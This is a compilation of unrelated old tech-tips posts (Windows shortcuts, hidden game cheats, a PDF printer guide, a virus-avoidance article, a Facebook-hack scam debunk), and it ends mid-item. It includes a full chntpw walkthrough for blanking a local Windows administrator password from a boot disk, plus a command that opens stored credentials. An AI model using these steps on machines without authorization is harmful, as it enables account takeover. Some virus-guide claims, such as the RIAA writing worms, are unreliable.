of wireless keyboard then this trick
can help you to do this. You can
operate your computer from a
distance. You can move
your cursor and use keyboard. You
just need three software , two on
your PC and one on your android
phone. Let me explain you the
whole procedure. Here are some
simple steps , just read and follow
them carefully..
STEP 1.
First of all download these three
files
RemoteDroid.apk ( Install It
On Phone)
RemoteDroid.zip (Install it
on pc)
Java SE Runtime
Environment 1.5 or
higher (Install it on pc)
STEP 2.
Now install .apk file on your
android phone and install Java SE
Runtime Environment on
your PC to open .jar file which is
in .zip file . (You will get .jar file
after unzipping the .zip file)
STEP 3.
Now connect your phone
to WiFi [Please note that
your PC/Laptop and android
phone should be on
same WiFi connection , means
which internet you are using on
your computer that should be used
on your android phone]
STEP 4.
Now open the .jar file [which i
mentioned in step 1] on
your PC using step 2.
STEP 5.
Now when you’ll open the .jar file,
then an IP will be there on your
computer screen as shown in below
screen.
STEP 6.
Now open app on your android
phone which you downloaded in
step 1.
STEP 7.
Now insert the IP from your
computer screen to App and click
on Connect.
That’s it,
Now Enjoy wireless operating.

Hello friends, If you are using
SAMSUNG java enable phone, then
you have facing a problem while
installing any Java App (Game or
Software). The problem is that you
can not install any java app. of size
mre than 300KB, but don’t worry
friends I am going to introduce you
with my new trick to recover from
this problem, If you follow given
steps then you can install any java
app of size upto 1MB.
STEP 1. - First of all dial
*#52828378# [i.e. *#javatest# ]
from your samsung phone.
STEP 2. - Now you’ll see follow
menu
1. Trace Setting
2. OTA type setting
3. Serial test
4. Change Suitecache Flag
5. Memory Test
6. OTA Test
7. Memory Log Setting
STEP 3. - Now choose option no. 6
[OTA TEST ]
STEP 4. - Here you’ll see
“Maximum Jar Size (KB)” , just set
this value 1000 .
you have done, now you can run
any java app upto 1MB
” ENJOY AND WAIT FOR NEW “

As you know there are many java
apps based on java platform, so i
decided to collect some best java
apps for my websites visitor i.e.
For you.
I listed these apps with download
link and their working, so grab
these all and enjoy . .
Opera Mini [ Opera Mini is
mobile web browser, it'll
help to browse internet
very fast on your mobile]
Uc Browser [Uc is also a
java mobile browser, which
have more option like
download manager, pc
mode browsing etc.]
Adrees File Explorer [It is
app to explore you memory
card or phone memory]
eBuddy [Chatting App for
10+ Social Networking
Websites]
Facebook [Facebook Official
App]
FacebookChat [Facebook
Chat App By mSonar]
NewsHunt [App To Read
ePaper From Your Mobile]
Nimbuzz [Chatting App to
Chat on 10+ Social
Networking Websites]
QQBrowser [New Java
Enable Browser To Browse
Internet From Your Mobile]
iBrowser [New Java Enable
Browser To Browse Internet
From Your Mobile by Ibibo]
ZipUtility [App To Unzip Zip
Files From Your Mobile]
Nokia Nearby [GPS App For
Non GPS Phones]
Mobi Explorer [App To
Browse Bluetooth Phone &
Memory Card]

This is a listing of some common shortcut keys in different versions Microsoft Windows.
Some shortcut keys below are not supported in all versions of Windows.
The shortcut keys on this page are only applicable for Windows in general, if you are looking for shortcut keys for a specific application (i.e. Excel, Word, etc..) please see the
links at the bottom of this page.
Use at your own risk.
Shortcut Key Supported Window Versions Short Key Description
Alt + (double-click) 95, 98, ME, NT, 2000, XP, Vista Open Properties dialog of selected item.
Alt + Enter 95, 98, ME, NT, 2000, XP, Vista Opens properties window of selected item.
Alt + Esc 95, 98, ME, NT, 2000, XP, Vista Switch Between open tasks available on the taskbar.
Alt + F4 95, 98, ME, NT, 2000, XP, Vista Close the top (focused) window.
Alt + Tab 95, 98, ME, NT, 2000, XP, Vista Switch between open windows.
Alt + Tab + Shift 95, 98, ME, NT, 2000, XP, Vista Switch between open windows, backward.
Ctrl + Alt + Delete (or Del) 95, 98, ME, NT, 2000, XP, Vista Bring up the Windows Task Manager, or reboot computer.
Ctrl + Esc 95, 98, ME, NT, 2000, XP, Vista Bring up the Windows Start menu.
Ctrl + '+' ('+' key on the keypad) 98, ME, NT, 2000, XP, Vista Autofit the widths of all columns (if available) in current window.
Ctrl + F4 95, 98, ME, NT, 2000, XP, Vista Close sub window/tab.
Ctrl + Tab 95, 98, ME, NT, 2000, XP, Vista Switch between existing tabs (within a window).
Ctrl + Tab + Shift 95, 98, ME, NT, 2000, XP, Vista Switch between existing tabs (within a window), backward
F1 95, 98, ME, NT, 2000, XP, Vista Open Help for Windows or focused application.
F2 95, 98, ME, NT, 2000, XP, Vista Rename.
F3 95, 98, ME, NT, 2000, XP, Vista Find/Search.
F4 95, 98, ME, NT, 2000, XP, Vista Select drives or display the list of drives
F5 95, 98, ME, NT, 2000, XP, Vista Refresh.
F6 95, 98, ME, NT, 2000, XP, Vista Switch focus to the address bar (if exists).
F10 95, 98, ME, NT, 2000, XP, Vista Switch focus to the top menu bar.
Shift + F10 95, 98, ME, NT, 2000, XP, Vista Same as mouse right-click on the select item.
Print Screen 95, 98, ME, NT, 2000, XP, Vista Capture a screenshot of the entire desktop to clipboard.
Print Screen + Alt 95, 98, ME, NT, 2000, XP, Vista Capture a screenshot of just the top(focused) window to clipboard.
Shift + Delete (or Del) 95, 98, ME, NT, 2000, XP, Vista Permanently delete selected file(s)/folder(s) (bypass recycle bin)
Shift (hold while inserting an audio CD to drive) 95, 98, ME, NT, 2000, XP, Vista Prevent autoplay.
* (keypad) on Windows Explorer. 95, 98, ME, NT, 2000, XP, Vista Expand all sub-directories from the selected item.
+ (keypad) on Windows Explorer. 95, 98, ME, NT, 2000, XP, Vista Expand only the first level of selected item.
- (keypad) on Windows Explorer. 95, 98, ME, NT, 2000, XP, Vista Collapse
Most keyboards have a Windows Key (key with a Windows icon). This key provides additional shortcuts for Microsoft Windows. Below is a list of the shortcut keys by
combining the Windows key and other keys.
Shortcut Keys Description
WINDOWS-KEY Bring up the Windows Start menu.
WINDOWS-KEY + F1 Bring up the Windows Help.
WINDOWS-KEY + e Open Microsoft Explorer.
WINDOWS-KEY + f Windows Search.
WINDOWS-KEY + Ctrl + f Search for computers
WINDOWS-KEY + d Minimizes all and bring up desktop, or restore all
WINDOWS-KEY + l Lock the computer (Windows XP & newer).
WINDOWS-KEY + m Minimizes all windows.
WINDOWS-KEY + Shift + M Restore all. Opposite with WINDOWS-KEY + M and WINDOWS-KEY + D.
WINDOWS-KEY + r Open the run window.
WINDOWS-KEY + u Utility Manager.
WINDOWS-KEY + Tab Cycle through the programs on task bar.
WINDOWS-KEY + Pause/Break Open the System Properties window.

Notepad Secrets
Create a log
1. Open Notepad
2. On the very first line, type in ".LOG " (without quotes) then press Enter for a new line
3. Now you can type in some text if you want, then save the file.
4. Next time when you open the file, notice its contents. Notepad automatically adds a time/date log everytime you open the file.
Text becomes unreadable
1. Open Notepad
2. On the very first line, type in "dont eat the donut" (without quotes) then save and close the file. Note: the file should have only one line of the text above.
3. Now, open the same file. You'll notice the text becomes unreadable squares. (try this with different text with the same format and length).
Paint Secrets
Create a trail image
1. Open Paint , then open an image.
2. Right-click on the image and select " Select All "
3. Now hold the "Shift" key and move the image around. The image will be drawn with trail.
10x Zoom
1. Open Paint , then open a small image.
2. Select the zoom " Magnifier" tool.
3. Windows Paint lists out the zoom options from 1x to 8x, but there is a 10x...
4. After selecting the Magnifier tool, point the mouse right at the border line right under "8x" and left-click. There you go.. the hidden 10x.
Other Secrets
Where is the relaxing music that you've heard during Windows XP Installation?
1. The file is in:
C:\Windows\system32\oobe\images\title.wma
Game Secrets
Solitaire: Instant Win
1. Press Alt + Shift + 2 to instantly win
Solitaire: Draw only 1 card (instead of 3)
1. Hold down Ctrl + Alt + Shift then click on unopen cards to draw.
FreeCell: Instant Win
1. Hold down Ctrl + Shift + F10 while playing, then click Abort.
2. Now move one card.
FreeCell: Hidden Game Modes
1. Go to "Game " menu choose " Select Game "
2. Here you can choose from game mode 1 to 1,000,000. But -1 and -2 will also work (hidden modes)
Hearts: Show All Card
Warning! this requires a modification on your registry. Be sure you follow the steps carefully. Damage your registry might damage your Windows.
1. Open the "Registry Editor" by: "Start" >> " Run" then type "regedit " and press Enter
2. Expand to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts
3. Right-click on the right panel and create a new String value with the name " ZB "
4. Double-click to open this key " ZB " to edit its value. Then enter " 42" and close the Registry Editor.
5. Start Hearts and Press Ctrl + Alt + Shift + F12 to show all the cards
Minesweeper: Stop The Timer
1. When you start to play a new game, the timer is ticking...
2. Press Windows Key + D to show desktop.
3. Now come back to the game by selecting it from the taskbar. The timer is stopped.
Pinball
1. Unlimited Balls: Type bmax at a new game to get unlimited balls (no notification).
2. Extra Balls: Type 1max at a new game to get extra balls.
3. Gravity Well: Type gmax at a new game to activate Gravity Well.
4. Promotion: Type rmax at a new game or while playing to get instant promotion and raising rank.
5. Extra points with partial shots: Partially shot the ball just to pass the yellow light bars. There are 6 bars. With the first bar, you'll get 15,000 points, 2nd: 30,000,...
6. Extra points with partial shots: Partially shot the ball just to pass the yellow light bars. There are 6 bars. With the first bar, you'll get 15,000 points, 2nd: 30,000,...
7. Test Mode: Type hidden test with a new ball or new game. Now you can use your mouse to drag and move the ball where you want.

The followings are some basic PC shortcut keys that are supported in most IBM compatible computers. They are also supported in most application software.
Use at your own risk.
Shortcut Keys Supported Window Versions Description
Alt + e 95, 98, ME, NT, 2000, XP, Vista Pull down the top Edit menu.
Alt + f 95, 98, ME, NT, 2000, XP, Vista Pull down the top File menu
Ctrl + a 95, 98, ME, NT, 2000, XP, Vista Select all text.
Ctrl + c 95, 98, ME, NT, 2000, XP, Vista Copy selected item(s) (to clipboard).
Ctrl + f 95, 98, ME, NT, 2000, XP, Vista Find.
Ctrl + v 95, 98, ME, NT, 2000, XP, Vista Paste copied item(s) from clipboard
Ctrl + x 95, 98, ME, NT, 2000, XP, Vista Cut.
Ctrl + Ins 95, 98, ME, NT, 2000, XP, Vista Same as Ctrl + c
Ctrl + (left arrow) 95, 98, ME, NT, 2000, XP, Vista Move one word to the left at a time.
Ctrl + (right arrow) 95, 98, ME, NT, 2000, XP, Vista Move one word to the right at a time.
Shift + Ins 95, 98, ME, NT, 2000, XP, Vista Same as Ctrl + v
Shift + Delelte (or Del) 95, 98, ME, NT, 2000, XP, Vista Cut. Or permanently delete selected item(s) on Windows Explorer.
F1 95, 98, ME, NT, 2000, XP, Vista Help.
Home 95, 98, ME, NT, 2000, XP, Vista Jump to the beginning of the line or page.
Ctrl + Home 95, 98, ME, NT, 2000, XP, Vista Jump to the beginning of the document or page.
End 95, 98, ME, NT, 2000, XP, Vista Jump to the end of the line or page.
Ctrl + End 95, 98, ME, NT, 2000, XP, Vista ump to the end of the document or page.
Shift + Home 95, 98, ME, NT, 2000, XP, Vista Set selection (highlight) from current position to beginning of the line or page.
Shift + End 95, 98, ME, NT, 2000, XP, Vista Set selection (highlight) from current position to end of the line or page.
Shift + (left arrow) 95, 98, ME, NT, 2000, XP, Vista Set selection (highlight) from current position to the left, one character at a time.
Shift + (right arrow) 95, 98, ME, NT, 2000, XP, Vista Set selection (highlight) from current position to the right, one character at a time.
Shift + (down arrow) 95, 98, ME, NT, 2000, XP, Vista Set selection (highlight) from current position to the next line down.
Shift + (up arrow) 95, 98, ME, NT, 2000, XP, Vista Set selection (highlight) from current position to the next line up.

Convert Any Document or Web Page to PDF
Somebody just told you that you need to have Adobe Acrobat (Writer) to create a PDF file? Guess what, you can get away from that pricey piece of software if you just need to
convert some documents to pdf, without a need of fancy editing the pdf document.
Here's how. Thanks to the BullZip, who provides a Free Pdf printer. With this free tool, you can simply "print out" your document or webpage to a pdf file, just about the same
way as you print it out to a printer.
You can visit BullZip.com for more information about the software.
1. To get started, first follow the link above and download Free Pdf Printer from BullZip, then install it to your computer.
2. Once you're done, you might need to close the program (or the web browser) which you're currently viewing the document. This helps refreshing the list of available
printers on your computer.
3. Once you get back to the document you want to convert, perform the same steps are you print out the document, i.e. File > Print ...
4. When you see the Print window pop-up, select "Bullzip PDF Printer " under "Printers", then click "OK ".
5. BullZip PDF Printer will then start to analyze your document and display a new pop-up window, where you can direct it to the location you want to save the pdf file.
6. Follow the pop-up windows and.. hola! The PDF document is created!

Forgot your administrator password?
Don't panic, it happens to some other people too, and you have found the solution! The following instructions will show you step-by-step
how to reset your local Windows password. This only works for local user accounts, however, not domain accounts.The password recovery tool from this page is written by
Petter Nordahl-Hagen, and the original information, as well as the downloadable tool, can be found from his website. According to the author, this tool should work for
Windows NT/2000/XP/Vista.
WARNING! Users who have EFS encrypted files on the Windows XP or Vista computers will loose access to the EFS encrypted files after recovery of your password!
Use this trick at your own risks
The tool to reset your password can be downloaded here .
I. Download the bootdisk:
1. Download the bootdisk, which includes the password recovery tool here . The file contains the ISO CD image.
2. Unzip (extract) the ISO file and burn it to a CD. Note that this is an ISO file, you must burn it to CD as an ISO image, not as a "data" file. If you're not sure how, see this
article. Also, the image is bootable, you need to burn the image to a CD using the image burning feature; do not extract the contents of the ISO and burn them to the CD,
you'll end up with a CD that can't boot!
II. Understanding the process:
You'll use the bootdisk created from the above steps to bootup your computer, which you want to reset your
administrator password.
You'll be asked for things like: which drive is the boot drive, which path to the SAM file, etc.. but don't worry, details
will be provided.
Once you have selected an account to reset the password, you'll need to type in a new password; however, it is highly
recommended to use a BLANK password at this point, then you can change your password later in Windows.
Follow the prompts to the end. You'll need to save the changes at the end!
III. OK! Enough talking. Here are the steps:
1. Startup your computer with the bootdisk created above. You should see a welcome screen following with a prompt:
boot:
2. Just wait, the bootup process will continute automatically. Then you should see a screen similar to this:
=========================================================
. Step ONE: Select disk where the Windows installation is
=========================================================
....
NT partitions found:
1 :   /dev/sda1    4001MB  Boot
2 :   /dev/sda5    2148MB
Please select partition by number or
a = show all partitions, d = automatically load new disk drivers
m = manually load new disk drivers
l = relist NTFS/FAT partitions, q = quit
Select: [1]
3. Notice the last line "Select: [1] " which shows the [1] as default selection because the tool detected the bootup partition is [1] . This might be different on your own
machine, so you should review the list shown under " NT partitions found: ". The partition with the word " Boot " should be selected.
4. Hit Enter once you confirm the selection. You should see a similar screen as follows:
=========================================================
. Step TWO: Select PATH and registry files
=========================================================
....
What is the path to the registry directory? (relative to windows disk)
[windows/system32/config] :
5. Notice the last line "[windows/system32/config] " which shows the default path. This was also detected by the tool. If the path is correct, hit Enter, or if you wish to enter
a different path, enter it now then hit Enter.
Here are the paths for different versions of Windows:
- Windows NT 3.51: winnt35/system32/config
- Windows NT 4 and Windows 2000: winnt/system32/config
- Windows XP/2003 (and often Windows 2000 upgraded from Windows 98 or earlier): windows/system32/config
6. Once you hit "Enter", you should see the next screen similar to the following:
-r--------    1 0        0          262144 Jan 12 18:01 SAM
-r--------    1 0        0          262144 Jan 12 18:01 SECURITY
-r--------    1 0        0          262144 Jan 12 18:01 default
-r--------    1 0        0         8912896 Jan 12 18:01 software
-r--------    1 0        0         2359296 Jan 12 18:01 system
dr-x------    1 0        0            4096 Sep  8 11:37 systemprofile
-r--------    1 0        0          262144 Sep  8 11:53 userdiff
Select which part of registry to load, use predefined choices
or list the files with space as delimiter
1 - Password reset [sam system security]
2 - RecoveryConsole parameters [software]
q - quit - return to previous
[1]
7. Hit "Enter" with the default option selected " [1] ". Then ...:
=========================================================
. Step THREE: Password or registry edit
=========================================================
Loaded hives:
  1 - Edit user data and passwords
  2 - Syskey status & change
  3 - RecoveryConsole settings
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)
What to do? [1] -> 1
8. Hit "Enter" with the default option selected " [1] ". Then ...:
===== chntpw Edit User Info & Passwords ====
RID: 01f4, Username: <Administrator>
RID: 01f5, Username: <Guest>, *disabled or locked*
RID: 03e8, Username: <HelpAssistant>, *disabled or locked*
RID: 03eb, Username: <pnh>, *disabled or locked*
RID: 03ea, Username: <SUPPORT_388945a0>, *disabled or locked*
Select: ! - quit, . - list users, 0x<RID> - User with RID (hex)
or simply enter the username to change: [Administrator]
9. Hit "Enter" with the default option selected " [Administrator] ", or select another user account. Here you can enter the full user account surrounded by < and >, CASE-
SENSITIVE, or enter the RID number (i.e. 0x1f4). Assuming you select the Administrator account, you should see the following screen:
RID     : 0500 [01f4]
Username: Administrator
fullname:
comment : Built-in account for administering the computer/domain
homedir :
Account bits: 0x0210 =
[ ] Disabled        | [ ] Homedir req.    | [ ] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account  | [ ] NMS account     |
[ ] Domain trust ac | [ ] Wks trust act.  | [ ] Srv trust act   |
[X] Pwd don't expir | [ ] Auto lockout    | [ ] (unknown 0x08)  |
[ ] (unknown 0x10)  | [ ] (unknown 0x20)  | [ ] (unknown 0x40)  |
Failed login count: 0, while max tries is: 0
Total  login count: 3
* = blank the password (This may work better than setting a new password!)
Enter nothing to leave it unchanged
Please enter new password: *
10. At the prompt "Please enter new password ", Enter the * for a blank password (HIGHLY RECOMMENDED!) then press Enter
Please enter new password: *
Blanking password!
Do you really wish to change it? (y/n) [n] y
11. At the prompt, type in "y ", then press Enter. Note that the default option is "n".
Do you really wish to change it? (y/n) [n] y
Changed!
Select: ! - quit, . - list users, 0x - User with RID (hex)
or simply enter the username to change: [Administrator] !
12. Enter the "! " to go back to the main menu. Then select " q" at the following menu to quit:
<>========<> chntpw Main Interactive Menu <>========<>
Loaded hives:
  1 - Edit user data and passwords
  2 - Syskey status & change
  3 - RecoveryConsole settings
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)
What to do? [1] -> q
13. A prompt to save changes displays, enter " y " to save:
=========================================================
. Step FOUR: Writing back changes
=========================================================
About to write file(s) back! Do it? [n] : y
14. The changes are saved! You should see the following screen, press Enter, and reboot your computer.
Writing  sam
***** EDIT COMPLETE *****
You can try again if it somehow failed, or you selected wrong
New run? [n] : n

Trick to hide files and folders using Command Prompt
The most important thing is that, once hidden with this method, the files/folders cannot be viewed by any search options even if you click "Show All Hidden Files and Folders".
Hiding the most wanted files and folders is very important nowadays and it's really a tedious job too. In order to make this tedious job an easy one, i'm going to deliver you a
the trick now.
For Example: You have a folder named " collegephotos" and this folder is stored in (Disk Drive E). You think that it should not be seen by strangers who use your PC.
For that you need to follow the following instructions
1. Press windowkey+R : Run command dialog box appears.
2. Now type "cmd " and hit enter. A command prompt window displays.
3. Now type "attrib +s +h E:\collegephotos " and hit enter.
4. The folder "collegephotos" will be hidden (Note: It cannot be viewed by any search options)
(To view this folder again, use the same command but replace '+' with '-' on both flags 's' and 'h')

Hacking Someone's Facebook
Password Using Some Software
Or Website? No Sir You Can't!
Do you know there are over thousands of
websites and software that claim to hack
Facebook password of any account? They'd
ask you the victim's profile ID, maybe your
credentials and some money too and will
reportedly tell you the password which, to be
honest, never works. Ever wonder why? Let
me tell you why, they're FAKE! They're a scam
which tricks you somehow in losing your
money or your own Facebook account. Just
give it a thought, why would Zuckerberg and
his team spend Billions of Dollars on
Facebook if one could hack it in less than a
minute? Today, we'll take a look at this topic
in detail with some example websites and
software and get answers to some common
related questions.
Back in 2005, I came across a mechanism
that reportedly hacked Yahoo mail password
for a user using some simple tricks. It didn't
work for me for obvious reasons but I didn't
stop believing the possibility until I grew up
to realize how helpless I am here. One of the
major concerns of large organizations like
Facebook and Yahoo is security because of the
super sensitive information about people they
have. Several hundred million dollars are
spend yearly by these organizations to ensure
security and then there's these websites that
claim to undo all that protection in less than a
minute.
Let's start with some examples here. I googled
the subject and picked the top results without
order. Didn't care to search harder because
there are thousands such and I know that all
are FAKE.
So let's look at this GETFBHACK.com .
Their FREE Facebook hacker program is said
to be capable of cracking the password of any
Facebook user within a day. Sounds cool, I
could try it out, but my Norton Antivirus
rejected the file straight away.
I also picked up another one. This Hack-
Fbook-Password asks me to enter the profile
ID of a user and it will crack the password. I
said Okay and began the process.
It ran certain algorithms to determine the
password and finally landed me on a page
that said I could DOWNLOAD the password IF
I fill an online survey first. Those of you
who've been redirected to surveys would
know they don't work and are put just so to
get traffic and earn money.
I said maybe I should leave the website now
but hey, they gave me a prize!
So I just became the luckiest person in my
city just like that!
Now tell me, how can a sane person believe in
all this?
Let me get this straight to you, these websites
do nothing at all just waste your time and are
never able to do the job. In fact, downloaded
programs just make the situation worse when
you run them. I had my Norton Antivirus to
guard me otherwise I could be in severe
danger currently.
These software are mostly keyloggers and
tracking programs that record your keystrokes
and action and steal personal information
from your computer in the background and
send it to their master servers. So ultimately
a hacker wannabe gets hacked , how ironic!
From now on in the post, I'll be using the
word 'Hacker' for these websites and software
since you're no more in the position to be
called that.
Setting up websites, maintaining them and
developing software is not an easy task. It
requires some money. So why do these
'hackers' do all the hassle? It's because they
get equivalent or more money in return. They
can extract your credit card details and other
banking info from your system and use it for
their advantage. They can hack your account
and use it for wrong purposes. Give me one
reason why one wouldn't steal money and
hack accounts for no loss.
Why do people try to use such unreal hacking
procedures? It's because it's unreal to me, it's
unreal to you but not to those who are not
much familiar with the working of a software.
They get in the web of these hackers and
eventually get screwed up pretty bad without
consent.
The websites give guarantees and also portray
their 'imaginary' happy customers so as to
trick a reader. Such tactics are simple but
really powerful and serves to their advantage
in most cases. This is also why there are
thousands of such websites available.
Well, NO. Facebook accounts can be hacked.
No online service is foolproof and that is
because of the flaws and bugs in their
software. There are several ACTUAL hackers in
the world who can analyse a website's security
and use that against it thus making hacking a
reality.
But I'm 100% sure none of them uses these
scam and fake websites that claim to do the
impossible. You can check out our hacking
section to know more.
I'll end the 'lesson' with an idiom, "look
before you leap". Focus, think and then
follow. In case of any queries or confusions
head over to the comments section. Cheers :)

2 February 2014

User's guide to avoiding virus infections

User's guide to avoiding virus infections Keeping an eye out for viruses

Computer viruses are everywhere! This guide will show you how to stay alert and how to avoid getting infections on your computer. Having an updated virus scanner is only a small part of this, there are many ways that you can prevent having viruses other than a virus scanner, as it will not always save you.

Types of viruses There are many type of viruses. Typical viruses are simply programs or scripts that will do various damage to your computer, such as corrupting files, copying itself into files, slowly deleting all your hard drive etc. This depends on the virus. Most viruses also mail themselves to other people in the address book. This way they spread really fast and appear at others' inboxes as too many people still fall for these. Most viruses will try to convince you to open the attachment, but I have never got one that tricked me. In fact, I found myself emailing people just to make sure they really did send me something. It does not hurt to be safe.

Worms Worms are different type of viruses, but the same idea, but they are usually designed to copy themselves a lot over a network and usually try to eat up as much bandwidth as possible by sending commands to servers to try to get in. The code red worm is a good example of this. This worm breaks in a security hole in Microsoft IIS (Internet Information Server) in which is a badly coded http server that, despite the security risks, a lot of people use it. When the worm successfully gets in, it will try to go into other servers from there. When IceTeks was run on a dedicated server at my house, there was about 10 or so attempts per day, but because we ran Apache, the attempts did not do anything but waste bandwidth and not much as I had it fixed a special way. Some worms such as the SQL slammer will simply send themselves over and over so many times that they will clog up networks, and sometimes all of the internet. Worms usually affect servers more than home users, but again, this depends on what worm it is. It is suspected that most worms are efforts from the RIAA to try to stop piracy, so they try to clog up networks that could contain files. Unfortunately, the RIAA have the authority to do these damages and even if caught, nothing can be done.

Trojans Trojans are another type of virus. They are simply like a server in which enables hackers to get into and control the computer. A trojan such as Subseven can enable a hacker to do various things such as control the mouse, eject the cd-rom drive, delete/download/upload files and much more.

MBR virues Boot sector viruses are another type, they are similar to file viruses, but instead they go in the boot sector and can cause serious damage when the computer is booted, some can easily format your drive simply by booting your computer. These are hard to remove.

Most viruses have various characteristics. For example, a worm can also be a trojan and also infect the boot sector. It all depends on how the virus is written and what it is designed to do. That's why there are not really strong structured categories, as they can easily mix one in the other.

Know the potentially dangerous files Like any other files, viruses must be opened in order to do something. Most viruses come through e-mail as an attachment. Some will make it look like it's someone you know, and it will try to convince you to open an attachment. Never open attachments at any cost! Some viruses will infect files in programs, so opening a program will actually open the virus, maybe the same one, or another part of it.

All files have what is called an extension; This is the 3 last letters after the last period. For example, setup.exe has a file extension of .exe.

Extensions to watch out for are .exe .com .bat .scr .pif .vbs and others, but these are the most seen. .exe .com .bat .pif and .scr are valid extensions for executables. A virus writer will simply rename it to one of these and it will work the same way. .pif is a shortcut to an ms-dos program and will have the ms dos icon, but will still execute whatever code is in it, so an .exe can be renamed to .pif and be run the same way. .bat is a batch file, which can contain instructions to do various file activities, but again, a .exe can be renamed to .bat and it will execute it! .vbs is a visual basic script. For some reason, Microsoft provides this scripting language along with the scripting host to make it more convenient to design and write viruses quickly and easily, I've never seen another use for this scripting language other than for writing viruses. There are programs that are written with that language, but it is compiled into an exe. Exe is the usual extension for programs, you would not have a software CD install a bunch of vbs files all over!

Bottom line is, if you don't know what a file is just don't open it. Some viruses will sometimes be named a way as to mask the real file extension to make it look like a harmless file such as a image file. This is easily noticed, but can still be missed. Simply don't open unexpected files.

If you get something that appears like something legit, just ask the person it came from if they sent it. Most viruses use a friend's address to make it look like it comes from them. The virus does this by using the person's address when sending itself to the address book contacts.

Downloads Email is not the only way to get viruses; P2P (file sharing programs such as kazaa, winmx, direct connect etc) is also another way to get viruses.

When downloading programs, the main thing to watch out for is the file size. If you are downloading a program that you expect to be rather large such as a game, don't grab a file that is 10KB, since it's most likely a virus. However, I've been caught with a virus even with large files, so file size is not the only thing to watch, as an exe is still valid even if junk is added at the end, so a 64KB virus will still function even if it is turned into 650MB.

Icons are something to look for too, fortunately, virus writers don't take time to put icons. If your download should be a setup file, you should see the icon of a setup file. If it's just the blank icon that typical plain or corrupted exes have, don't open it.

Another thing to do, which should be obvious, is to scan the file for viruses using updated virus definitions. But don't rely on only your virus scanner, as they are not perfect, and if the virus has not been reported to them yet, they won't know to create a definition for it!

Changing settings to stay safe If you do open a virus, you want to avoid it going to all your friends. The simplest thing to do is to NOT use the windows address book. It is easy for viruses to get through and Microsoft is not doing anything about it. Just don't use it. Put them in spreadsheet or even better write them down somewhere. Don't use the address book.

Another "feature" to avoid is the auto preview. Some viruses can attempt to open themselves just by opening the email. There are security holes in Microsoft mail programs that allow this. In Microsoft Outlook, click on the view menu and remove auto preview. You need to do this for every folder, but the inbox is most important. In Outlook Express, click on the view menu and go to layout. In the dialog box, you will see a check box for show preview pane. Uncheck it and click ok.

Another thing you should change, especially if you download a lot, is the option that allows you to view the file extension. In Win98, go in any folder, click on view then folder options and choose the view tab and where it says hide file extension for known types, uncheck it. In win2k, it is the same process, but instead, go in the control panel and open the folder options icon.

Avoiding server worms Some viruses, mostly worms, can exploit through servers and affect other servers from servers that have been infected. A good example is the SQL slammer. This was a worm that affected SQL servers run by Microsoft IIS and Microsoft SQL Server. Once the worm gets in, that particular server starts trying to find more exploitable driving internet connections to a halt in the process. Servers running Apache were unaffected by that, except for the many hits to try to get in. IceTeks received about 100 hits per day when it was run on a dedicated home server. Most hits came from major ISPs and other big websites that had no clue they were still affected.

The simple solution to avoid these types of viruses is to NOT use Microsoft based server software for your server, especially if it is a public server. The operating system is also crucial, but the actual server software is much more. Apache, which is free, is much more secure than Microsoft based server programs such as IIS. IIS may be easier to understand and administer, but it saves a lot of hassle to learn how to use Apache. IIS has a large number of vulnerabilities, such as the ability to gain access to cmd.exe and basically delete the whole drive by doing a ../ request in the address bar. These don't require viruses, but simply commands, but there are worms written to automatically make these commands. The code red does this.

Removing a virus The best way to do this is to do a clean install. However, depending on how bad the virus is, a simple clean install won't remove it. So to be extra sure, you'll want to do a low level format. This is especially true of you got a boot sector virus, as even repartitioning and formatting won't quite remove it, but sometimes you can get away with an fdisk /mbr, but not all the time. here are various removal tools for viruses, it is good to use them and see if they work, but proceeding with the clean install is recommended. You never know if the virus is completely removed by deleting files you suspect are infected. Some viruses such as the Bugbear will close anti virus programs and other programs to make it hard and annoying to figure out what to do. A clean install is the best way to ensure that it's gone for good.

Viruses are out there, don't be one of the many infected ones! Stay alert and stay safe! Don't open unexpected files, regularly update your virus definitions and scan downloaded files!

I hope this article was useful for you!

Follow the following steps to boot windows xp fast

1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:\

2. From the Start menu, select "Run..." & type "gpedit.msc".

3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.

4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".

5. Click "OK", "Apply" & "OK" once again to exit.

6. From the Start menu, select "Run..." & type "devmgmt.msc".

7. Double click on "IDE ATA/ATAPI controllers"

8. Right click on "Primary IDE Channel" and select "Properties".

9. Select the "Advanced Settings" tab then on the device or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".

10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.

11. Reboot your computer

Access Stored User Names And Passwords, Xp Users

Access Stored User Names and Passwords

Windows XP related

Access Stored User Names and Passwords with rundll32.exe in Windows XP

1. Click on START - RUN Type

rundll32.exe keymgr.dll,KRShowKeyMgr

2. Press Ente

All MS WORD Shortcuts

All MS WORD Shortcuts,
useful!!!!!!!!!
